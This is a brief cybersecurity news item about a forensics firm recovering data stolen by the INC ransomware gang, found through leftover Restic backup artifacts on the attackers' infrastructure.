INC ransomware data recovered due to operational security lapse

As reported by Bleeping Computer, a significant operational security failure by the INC ransomware gang has led to the recovery of data stolen from at least a dozen U.S. organizations. This incident highlights how misconfigurations and overlooked artifacts can provide crucial avenues for data retrieval.

Cyber Centaurs, a digital forensics firm, uncovered attacker infrastructure during an investigation into a ransomware attack on a U.S. client. The attackers utilized a variant of RainINC ransomware and, unexpectedly, left behind remnants of the legitimate backup tool Restic. Although Restic was not used in the actual encryption, its presence indicated the threat actor's infrastructure was storing exfiltrated data. Researchers discovered PowerShell scripts and hardcoded variables associated with Restic, suggesting the data repositories might persist long after an attack. A controlled enumeration process confirmed encrypted data from 12 unrelated U.S. organizations across healthcare, manufacturing, technology, and service sectors was accessible.

This incident underscores the importance of thorough forensic analysis and the potential for data recovery even after successful exfiltration. The findings have led to the creation of detection rules to help organizations identify similar attack patterns.

Source: Bleeping Computer